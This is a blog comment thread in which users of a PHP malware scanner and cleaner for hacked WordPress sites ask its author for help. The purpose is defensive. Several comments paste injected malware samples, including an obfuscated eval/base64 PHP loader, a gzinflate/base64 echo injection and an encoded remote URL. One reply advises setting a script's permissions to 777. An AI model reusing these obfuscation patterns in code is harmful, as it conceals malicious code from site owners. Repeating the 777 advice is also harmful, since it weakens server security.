http://www.php-beginners.com/wordpress-hack-malware-scanner.html
Please send me the result asap at info@php-beginners.com
Thanks.
Paolo
Thanks tons!! I ran this on a clients site which has an enormous file volume. In the end there were 20k compromised files inspected and cleared. Life saver status Kudos to you!!
AWESOME!
Pingback: Hacked! » manyhighways
Hello Paolo! I admire how you help people in trouble like me.
Could you tell me what this script did to one of my sites: http://pastebin.com/AVfc8rt0
I used some online tools to decrypt some parts (and founded some chmod’s there) but not sure of all, I cleaned (as far as I know) the site but want to know if the database was compromised.
Thanks in advance!
Hey Daniel,
I tried to decrypt the eval code, here’s what I’ve got.
http://pastebin.com/LXf0zPtG
http://pastebin.com/WdpM8FdN
http://pastebin.com/BLFHxTWm
I think this file http://pastebin.com/LXf0zPtG is responsible for writing the content of the malware codes.
But I’m not 100% sure. I just said that because I found this file_put_contents in the code.
I advice you to delete the code, immediately, it might access your database, files, and everything on the server.
Change your WP and FTP password.
Other than that your site looks awesome!
Paolo
You are so kind. I deleted it already and scanned with no bad results
Thx again and keep being so helpful
Best regards!
Ciao
Don’t mention it. I’m glad that your site is clean now.
Ciao!
My site is showing up a nasty “cialas” message as the description of my site in Google SERPs. Needless to say, this is not the description seen when you simply key in the site and go there. I thought the problem might be some sort of malware, so I ran cleaner 2.5 on my site and came up clean. Does this mean I can now eliminate malware as the source of the problem? Any ideas on what is causing this?
Hi E,
I have checked your site. I really show “cialas” on google result.
Don’t worry this will be replaced when google crawl your site again.
or you can ask google to remove your page:
http://support.google.com/webmasters/bin/answer.py?hl=en&answer=164734&from=156412&rd=1
This attack is called “Pharma Attack” used in “Blackhat SEO Spam” technique.
This is attack is difficult to notice, since, we can only determine it by using
google / search engines.
I tried a spider simulator to your site:
http://tools.seobook.com/general/spider-test/
It shows now the correct description. I think the cleaner deleted the
malicious script already. I hope so. But, I’ll advice you to run the malware scanner:
http://www.php-beginners.com/wordpress-hack-malware-scanner.html
and send the result to me at info@php-beginners.com.
Paolo:)
Hi Paolo,
Just today I have found that my server is all messed up with this eval(base64_decode trojan. I have tried to run your scanner (http://utilisbpo.info/cleaner_2.5.php) but it’s giving an error page. Can you please look into it? I have lot of sites of my clients hosted here.
Thanks and regards,
Jawad Khan
eTek Studio
http://www.etekstudio.com
845-704-1900
Hello Jawad,
Oh! you need to remove that immediately.
Can you run it using the Shell terminal?
I tried running the cleaner:
http://www.utilisbpo.info/cleaner_2.5.php
but it didn’t give me an error. It’s loading…
Just wait until it finishes scanning all the files,
don’t close the browser. When it finishes loading
please send me the result.
But I would suggest this running on Shell terminal or
CLI cleaner version because it’s fast.
Also, please don’t forget to backup your files.
Let me know.
Paolo
WOW, what a quick response. Really impressive.
How to use shell terminal? I am not a developer.
I have removed the file as you advised. When it was uploaded, it was showing some results (maybe 500-1000) files. But after few minutes, it was giving error message.
Best regards,
Jawad
From ‘removing that’, were you referring to virus or the file? I have removed the file. Please correct if I am wrong.
Thanks and regards,
Jawad Khan
eTek Studio
http://www.etekstudio.com
845-704-1900
Hello Jawad,
That’s good! I thought you’re not a developer.
You don’t need to remove that manually. I was referring
to use the cleaner script to remove the malware codes.
But if you removed and the site is still working well
that’s good.
I was referring to both of them. Some malicious codes are inserted in 1 file, most of them are inserted inside a normal php file.
Just run the cleaner script it will do the job.
Hi Paolo,
The script is working fine if I run it folder by folder. But if I put it on root, it’s giving 500 error. I realize that it’s because it has to scan thousands of files so it must be timing out.
I have unlimited hosting plan through godaddy so this time out is kind of strange.
Any suggestions? It will take days to clean by going in each folder. Is there any way I can run it through root?
Thanks and regards,
Jawad Khan
eTek Studio
http://www.etekstudio.com
845-704-1900
Hello Jawad,
I would suggest you use CLI version.
You can access your server using SSH here’s the
tutorial for godaddy:
http://support.godaddy.com/help/article/4942
If you have problems access it, please let me know.
Thanks.
Hi Paolo
My 5 sites have an eval(base64_decode(“etc etc Trojan in every theme index file and more. Dreamhost gave me a list. I found your excellent site and ran your Browser version of the cleaner on a couple of the sites and it worked, which was FANTASTIC:) Thanks so much. There were even more infected files than on Dreamhost’s list. However, this morning I’m back to square one. Could the problem be just that I didn’t do all the sites one after the other? I actually tried to do a couple of sites at a time, but this didn’t appear to work. Can you please advise?
Hi Ali,
Yeah! I think the malware script resides on the other sites that you
haven’t cleaned. Try to run the cleaner on the sites that you never
cleaned before and then to the other sites. See if it will inject
the malicious codes again.
Also, please change your ftp & WP password.
If problem still persists, run the malware scanner:
http://www.php-beginners.com/wordpress-hack-malware-scanner.html
send the scan result to info@php-beginners.com
I’ll try to find the file that is causing the malicious codes to
keep on coming back.
Let me know. Thanks.
Paolo
Hi,
500 internal error continue to occur, when I excute scanner.php and cleaner.php.
I ran HTTP version.
Please Please help me~~
Hi Sam,
Did you ran them together at the same time? That’s not advisable
especially on HTTP version.
500 internal error is really very general error type of reporting.
This means something has gone wrong inside your server, this maybe
because of overload or something, because running scanner or cleaner
in HTTP version consumes a lot of memory.
If you still see 500 internal server error. Please contact your
hosting support.
I’m gonna be upgrading this so it wont happen again. Let me know.
Keep you posted. Thanks.
Paolo
Hi
I have the god_mod trojan and it is a pain. The trojan have infected all my .php files. Your script can detect the infected files but cant clean them. Then I look at the file, some extra code (uuencoded) is added at the same row as the starting <?php. Is it possible to make a script that remove the row and add a new <?php. I use this script at the cli to detect the trojan (cant use php cli) or your web script.
find . -exec grep -l "god_mod" {} \;
Best Regards
Erik
Yeah! Sure, can you paste a sample infected code here:
http://pastebin.com/
I’ll check and I create a pattern of it.
Let me know. Thanks.
http://pastebin.com/E1T1YuWu
Can you send me the whole file instead Erik to info@php-beginners.com
I just want to whole malware signature. Thanks.
Paolo
Done
I have maeiled you a Word press file wp-mail.php
Oh! yeah! Erik I forgot to email you back.
I already included “god_mod_on” malware signature,
on cleaner_2.6 I upgraded the version.
It will now clean your site. Please download and run it.
Let me know.
Paolo
Hi,
I have cleaned two sites through ssh version.
and I requested review to google. but rejected.
Can you solve it after you check the log file I scanned?
Let me know your email address.
Thanks.
Yes, sure, send it to info@php-beginners.com
I’m sorry Sam but what do you mean by “requested
to review and rejected by google”?
Yes, I have cleaned my site using your tool(SSH version) and then I have requested for review to google.
But rejected by google.
I will send you scan log file(2 sites)
Thanks.
I sent you scan and clean logs.
I want to be out of blacklist of google^^
Thanks.
ah ok hehehe.. how did you know you were blacklisted from google?
Vey Thanks for your kindness.
My one site is restored to normal. Thanks.
The blacklist I said is,, when I access the web site, blocked in firefox..
GREAT! That’s really nice to hear. Be careful next time make sure you have the updated WP and Plugins.
Paolo
This is a real basic question. Where do I enter the shell script? In cPanel or on a local app that connects with my ftp. My blue host account was recently attacked and I did all the fixes manually and spent a few days fixing everything. I’ve read about using shell scripts but wasn’t sure where to input the code. I’m on a Mac using Lion if that means anything.
Thanks for your help!
John
You’re welcome John. Good question John.
Since you’re using bluehost. SSH is not enabled by default.
To enable SSH access you can go here:
https://my.bluehost.com/cgi/help/180
To connect to your server go here:
https://my.bluehost.com/cgi/help/301
Let me know if you have questions.
Thanks.
Thank you for this Code. I’ve clear a complete Joomla-Installation. It was the second Time that the Malware infected all the php’s.
Best Regards from Germany
Peter
Thank you Peter.
I’m it glad that the script helped you clean your site back again.
Please do change your ftp and wp password and secure a backup of your clean files and db.
Have a great day!
Paolo
Thanks Pablo for your help! I was able to setup SSH for my account so I’m ready for action. I hope I never have to use it. But while I was at it I started using SFTP via Transmit FTP app and the performance is so much faster than using regular FTP. SFTP uses a secure port so it doesn’t have to negotiate a port number each time there is a request. Also with SFTP I’m now able to change directory and file permissions… I couldn’t do that using plain old FTP.
Thanks!
John
Wow, that’s a really helpful information John. Thanks for sharing it.
SFTP is really a secure one. Thanks again John. Have a great day!
Pingback: Automated Fix for WordPress base64_decode Injection in PHP Files « Blog de xkortazar
Hi, my site has been infected with the code below. This code is inserted in 30 or 40 php and html files. I have to removed it every 2 or 3 days and it constantly reappears. I ran your Cleaner and presently I don’t have any infected files but I know they will keep coming.
I have changed my WordPress and ftp passwords.
Many thanks for your help,
Eric
The code:
#d93065#
echo(gzinflate(base64_decode(“tVVNc9owEP0r………………aTx2nE4Mvo1VdZHr5G2d339mL9Cw==”)));
#/d93065#
You have to find the culprit… the files that are generating the malware code. Compare a healthy WordPress site by downloading the latest WP version and compare all the files and folders/directories. Usually the malware will add extra flies/folders inside wp-content directory. Naming will look like it belongs but once you compare sites you’ll see what doesn’t match. Also check all the index.php and .htaccess files for code that doesn’t belong… I found a .htaccess file in my root directory that was generating malware. Also change the file permissions to 444 on .htacess and index.php files.
Hi,
The same code keep coming but now it’s everyday and only on my index.html in the root.
I checked the folders with Ultra Compare and did not find any extra files execpt for all the plug-in. There’s a lot of files witch is not like the original but I don’t know what to look for.
This is my .htaccess file in the root. I don’t know if there’s a malicious code.
# For security reasons, Option all cannot be overridden.
#Options All -Indexes
Options ExecCGI Includes IncludesNOEXEC SymLinksIfOwnerMatch -Indexes
AddType text/cache-manifest .manifest
AddType video/ogg .ogv
AddType video/mp4 .mp4
AddType video/webm .webm
SetEnvIfNoCase Request_URI \.(og[gav]|mp4|m4a|webm)$ no-gzip dont-vary
# BEGIN WordPress
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ – [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
# END WordPress
Many thanks for help,
Eric
Hello Eric,
Can you please run the Malware Scanner and send the result to me at info@php-beginners.com
http://www.php-beginners.com/wordpress-hack-malware-scanner.html
Let me know. Thanks.
Thank you !!
Thank you, I’ll try that.
Pingback: WordPress Hack : Malware Scanner | Komputer, Internet, Software Tips
I copied the script to my server. Here’s the link http://Pulkit.me/scanner.php (or cleaner.php)
It however, keeps on running. What should I do?
Hi Pulkit,
Just wait for the script to finish cleaning your files.
Paolo
I did. I get a 404 error after waiting for 5-7 minutes.
Pablo please! Help!
Hello Pulkit, Yeah! sure what can I help?
Every time I run the scripts I wait for them to finish. After 10-15 minutes of waiting I get a 404 error on both of them.
The malware makes a https.php file in the Wp-includes directory. I can’t find how it makes it. Do you have any idea? Can I send you all the files or give you access to my FTP? Please?
I’m not really sure why it throws an error. Can you use the CLI version. Do you know how to use SSH?
Does your hosting allow SSH?
Let me know.
I don’t know how to use SSH. But my server does allow it. Please help!
Hi Pulkit,
I created a post for you – “How to login using SSH in PuTTY”.
http://www.php-beginners.com/how-to-login-to-your-server-using-ssh-in-putty.html
I SSHed it and got the following error
[gaborone]$ time php cleaner.php 2>&1 >> cleaner_log
Could not open input file: cleaner.php
real 0m0.040s
user 0m0.028s
sys 0m0.008s
You must be in the correct the directory where your cleaner-cli_2.7.php or cleaner.php (if rename the file to cleaner.php) file exists.
I ran the scanner from CLI and got this, but got no log file. What to to do now?
[gaborone]$ time php scanner_2.4.php 2>&1 >> scanner_log | tail -f scanner_log
^C
real 7m47.685s
user 0m0.044s
sys 0m0.028s
You must be in the correct the directory where your scanner_2.4.php file exist.
Both the files are in the same directory (root) and yet one is getting recognized while other can’t be found.
hmmm.. please double check the files.
I assure you that I have. Would you like to check yourself? Please?
yeah! sure! hmm add me up on skype oo70vd
Thanks for your work and for sharing it, Paolo. Does this this script work too for malware that seems to use some kind of fake “botanalitics” in WordPress installations? It injects php files with code that includes:
base64_decode( ‘aHR0cDovL2JvdHN0YXRpc3RpY3VwZGF0ZS5jb20vc3RhdC9zdGF0LnBocA==’)
which decodes to http://botstatisticupdate.com/stat/stat.php
As I say, I think I’ve deleted all of the infected portions since they were on files changed on the very same date and time, so I think I could locate them all, but I am not sure what was the security flaw yet so I’m afraid it might reproduce itself… and a script for automatic elimination in the meantime might come in handy.
I came across the
base64_decode(‘aHR0cDovL2JvdHN0YXRpc3RpY3VwZGF0ZS5jb20vc3RhdC9zdGF0LnBocA==’)
intrusion as well. In my case they got in via FTP. I sometimes use NetDrive for FTPing. I look after a bunch of VPS’s and shared web accounts. But only the accounts I had set up in NetDrive were compromised. The other VPS’s and shared web accounts were not touched, but all the ones I had setup login details in NetDrive were.
They must have got a sniffer on my local PC.
I had to add a new regex to the cleaner-cli script to pick out this attack:
$aPattern = array(
""
);
I’m sure there is a much better regex string, but this did the trick for me.
The injected code I was trying to match and remove:
And thanks Paulo. My servers are clean again thanks to you.
Paolo,
The code snips in my second reply got stripped out. Not sure if I did something wrong, I used code tags.
If you want them to help you add this malware to you script, then email me and I’ll send them directly to you.
Just email it to me at info@php-beginners.com
How long does the script take to run? And how do I know if it has worked? I’m fairly new at this, but have several sites that got hacked and are taking my visitors to porn.
Thanks!
Wew, it takes Ryan 10-20 min on typical WordPress installation.
If you have lots of php files that would really take time.
Are you using CLI version? Let me know.
Thanks for your cleaner.. really appreciate your work..
what can be reg exp for this:
You’re welcome. What do you mean “reg exp for this:”?
i tried to paste the malware code but its not being saved. i saw you are using array for the patterns to find. i have few issues here. and i need the regx for that pattern.
<?php @error_reporting(0); if (!isset($eva1fYlbakBcVSir)) {$eva1fYlbakBcVSir = "7kyJ7kSKioDTWVWeRB3TiciL1UjcmRiLn4SKiAETs90cuZlTz5mROtHWHdWfRt0ZupmVRNTU2Y2MVZkT8h1Rn....... ... .GUm85MmNIUm5iRVJIVnNGbWRsUkNJc0lDZmlnU1prOUdidzFXYWc0Q0lpOGlJb2cyWTBGV2JmZFdaeUJIS29ZV2EiKGVkb2NlZF80NmVzYWIobGF2ZScpKTskZXZhbFVkQ1hURFFFUm1XbkRTID0xODc5Mjt9";$eva1tYlbakBcVSir = "\x65\144\x6f\154\x70\170\x65";$eva1tYldakBcVSir = "\x73\164\x72\162\x65\166";$eva1tYldakBoVS1r = "\x65\143\x61\154\x70\145\x72\137\x67\145\x72\160";$eva1tYidokBoVSjr = "\x3b\51\x29\135\x31\133\x72\152\x53\126\x63\102\x6b\141\x64\151\x59\164\x31\141\x76\145\x24\50\x65\144\x6f\143\x65\144\x5f\64\x36\145\x73\141\x62\50\x6c\141\x76\145\x40\72\x65\166\x61\154\x28\42\x5c\61\x22\51\x3b\72\x40\50\x2e\53\x29\100\x69\145";$eva1tYldokBcVSjr=$eva1tYldakBcVSir($eva1tYldakBoVS1r);$eva1tYldakBcVSjr=$eva1tYldakBcVSir($eva1tYlbakBcVSir);$eva1tYidakBcVSjr = $eva1tYldakBcVSjr(chr(2687.5*0.016), $eva1fYlbakBcVSir);$eva1tYXdakAcVSjr = $eva1tYidakBcVSjr[0.031*0.061];$eva1tYidokBcVSjr = $eva1tYldakBcVSjr(chr(3625*0.016), $eva1tYidokBoVSjr);$eva1tYldokBcVSjr($eva1tYidokBcVSjr[0.016*(7812.5*0.016)],$eva1tYidokBcVSjr[62.5*0.016],$eva1tYldakBcVSir($eva1tYidokBcVSjr[0.061*0.031]));$eva1tYldakBcVSir = "";$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;$eva1tYldakBcVSir = "\x73\164\x72\x65\143\x72\160\164\x72";$eva1tYlbakBcVSir = "\x67\141\x6f\133\x70\170\x65";$eva1tYldakBoVS1r = "\x65\143\x72\160";$eva1tYldakBcVSir = "";$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;} ?>
I see, can you please send me 3 sample infected files. I’ll check the malware signature and create a pattern.
Please send it to info@php-beginners.com
Let me know. Thanks.
Great work paolo. I am very greatfull to you. Thanks a lot.
Gr8 post Paolo, very useful to cleanup my blogs. Thank you so much
Awesome thanks.
Paolo,
I have been attacked by the base64_decode hack and read through this blog and was going to try this route. So the first thing I did was upload your cleaner and scanner files to my server root directory. Next opened puTTy. I copied your code for the scanner in the command line and get the following result.
tail: cannot open `scanner_log’ for reading: No such file or directory
tail: no files remaining
This is my first time using shell access, so thanks for any suggestions…
Doc
I spoke with bluehost and was able to fix the problem. I had to change directory to public_html and now it is running. I know this was asked before as to time, and read that 10-20 minutes for a typical WP installation. I have 4 domains hosted on my site, with alot of php files. So how long should I give it to run before you would consider it too long. I was running it before and it stopped and said terminated. I was attributing (right or wrong) this to the fact that I had copied a file from one location to the other on the server while it was running. So I started it again. How long should I let it run … 1 hr, 12 hrs, more?
Thanks,
Doc
Typical wordpress installation would normally take up to 10 – 15 mins. The more php files you have the longer the script runs.
Just in case, I was hacked on bluehost + wordpress too (on april 30 th). Bluehost denies all responsibility and I believe them, but I haven’t found the original vulnerability in WordPress/plugins yet. I don’t know if your problem was the same as mine (see above). Maybe it would help to find a pattern (hosting provider, cms, plugins…).
Speaking of everything, since I never got an answer to my question from Paolo (I wanted to know whether his script scans also for the specific infection I found or not), I ended up signing up for a paid premium service that scanned my site for malware, mysql injections, etc., and according to them, there were no more vulnerabilities or additional backdoors… and despite I haven’t changed/updated anything (everything was already updated in the first place) I haven’t been hacked again, so I’m really at a loss about what happened ???
Hello Carlos,
Hackers nowadays are really pretty clever:
1. they login to your server using vulnerability scripts
2. if you login to your server using ftp in an infected computer – they can get in as well.
3. brute force attack
4. Hosting/Shared server is infected
5. phishing attack
6. XSS attack
7. and a lot more…
I’m not really sure how get in to your server. The only advice I can
give to you now is:
1. create a strong password both ftp and wordpress account.
2. update your software
3. if you think your computer is infected. Please do clean it up.
4. Create a clean backup – because we don’t know when they will
going to attack again.
We cannot stop the attack because they’re creating and improving
their ways to hack the only thing we can do for now is to prepare
ourselves when that day happens.
You can test my malware scanner:
http://www.php-beginners.com/wordpress-hack-malware-scanner.html#id-download
It scans most malware signatures that I know, but if you think that my scanner
cannot detect the malware that’s in your site, please don’t hesitate to send it
to me at info@php-beginners.com and I’ll create a way to detect it.
I hope that helps.
Have a great day!
Oh, thanks for your answer Paolo. Yes, I thought of everything you say, but it’s good to check that list again… In fact I think I’m going to make my password even stronger (I already changed it, but I’m going to change it again to a more complex one).
I don’t think I had a virus in my desktop but yes, just in case, I even re-formatted my PC and reinstalled Windows, and of course changed my password. I’ve updated my antivirus to a full internet security suite (norton) just in case. I’ve stopped logging in to my control panel from my smartphone just in case the password was stolen through it. I have done all kind of paranoic things but haven’t been able to find nothing out of the ordinary.
Of course I might be wrong but I think I have ruled out all the possible causes, and if I had to bet, my money would be on some inscure script/plugin on my WP installation. Also, it has to be something easily “scanned”, since I think I was attacked just because I was detected as vulnerable.
Anyway. I’m sending you my old infected index.php file just in case. Maybe your script already detects it, I couldn’t really check because I had already removed it from the server when I uploaded your scanner, and I don’t want to put the file on the server again just to run the test, to minimise risks.
Again thanks a lot for your time answering my question and again thanks for sharing your work and expertise.
I ran the .php file but I’m not really sure what I’m looking at. Could you take a look at the returned results and tell me what the next step is. I thought it would remove the code from the infected files but I’m not sure I’m using it right. http://vtm-dlp.com/wordpress/cleaner_2.8.php
Thanks
Hello Norm,
I checked ran the cleaner in your site and it has a warning:
————————————————————
Warning: fopen(./wp-mail.php) [function.fopen]: failed to open stream: Permission denied in /home/content/n/o/r/normsfields/html/VTM/wordpress/cleaner_2.8.php on line 206
————————————————————
Can you change the cleaner permission to 777 and run again the cleaner.
Let me know. Thank you.
Pingback: Blog被Hacked,修复方法 at live@haliluya
Appears to have worked on my Joomla site as well! Many thanks!
CH
Let me first say “thanks” and “congrats” on a great piece of software.
After I ran it, when I attempt to go to saac-arts.org from Google.com, it returns me to Google.com, with Russian links at the top, and “An unknown error” in the Search Bar.
I have also run it on “HealthWorksFitnessCenter.com” with the same results.
Thanks,
CH
Now, after running cleaner_2.8 on HealthWorksFitnessCenter.com it redirects to the regular Google.com site.
hmm.. Can you run for me the malware scanner?
http://www.php-beginners.com/wordpress-hack-malware-scanner.html#id-download
and send the result to me at info@php-beginners.com
Thanks.
Pingback: VeryBig.org » Recent WordPress Hack Attack (including eval base64decode) Resolved
Hi,
I’m getting a 500 and 404 error using html scanner on Dreamhost. I do not have shell access.
Anything I may try?
Thank you!
Aaron
“500 Internal Server Error
The server encountered an internal error or misconfiguration and was unable to complete your request.
Please contact the server administrator, webmaster@ and inform them of the time the error occurred, and anything you might have done that may have caused the error.
More information about this error may be available in the server error log.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.”
Hello Aaron,
I apologize for the late reply.
You can active your SSH Access here:
http://wiki.dreamhost.com/Enabling_Shell_Access
Dreamhost allows you to use SSH.
Let me know.
Regards,
Paolo
Hi,
I think the program worked.. it’s created a cleaner log file… but how do you know when it’s finished running? And do I need to do anything with the cleaner log file? Are the viruses still there or did it clean them permanently?
Thanks again
Hi Paolo,
Been here once already and made a donation. I’ve recently ran your cleaner script again (unlucky me!).
Anyway, this is just a short note to say THANK YOU for keeping the script up to date. I’m sure you’re helping dozens of people in trouble like me.
Yes, thank you for your donation before Victoria. I’m always updating the script.
Well, I’ll just keep you posted. Hope you’ll not be attacked again.
I checked your site and it’s really a very good looking site and unique.
Thanks again.
Hi Paolo,
I seem to have picked up a nasty script which has been added to every .php file in my hosting account. It has appended this at the top of each index.php file:
“”; echo “”;
Do you think you could send me an e-mail if you are able to create me a script which can clean this up? I will make a donation of course!
Thanks,
Greg
NO worries just send me 3 infected files to info@php-beginners.com
Pingback: New Panda/Penguin Update Deciphered? | The Hoist | An SEO Link Building Service For Everyone
Hello Dear Admin, I am getting an base64 code virus is all my php files as well as all the js and dev.js files have [x73/63/…. (something like that) in the end of every js files, please do let me know any way through which i can delete these two codes from all my wordpress files.
Thanks
Please email me the tip as well as any script for this.
Hello Faheem,
Did you try to run the malware cleaner?
http://www.php-beginners.com/solve-wordpress-malware-script-attack-fix.html#id-download
Please do backup your files before you run the cleaner.
Let me know.
I have been infected by malware on all of my sites. I’ve tried installing the cleaner_2.9.php on my server and it redirects to another link or nothing happens. What am I doing wrong?
Hmmm.. can you check your .htaccess maybe that’s the reason why it redirects.
Paolo
Ok fixed that. Now when I run the cleaner, I can’t tell if its working or not. Is it just a blank screen for 10-15mins?
I can’t tell if its working or not. Is it just a blank screen for 10-15mins?
Just wait until the script finishes loading… Let me know.
Hello Paulo,
New to this.
I put the ,php on the root and it keeps saying.. “waiting for ibertrainz.eu” ?????
What Am I doing wrong?
THank you,
Alberte
Hope that the disinfection lasts. Thank you very much for your tool.
Alberte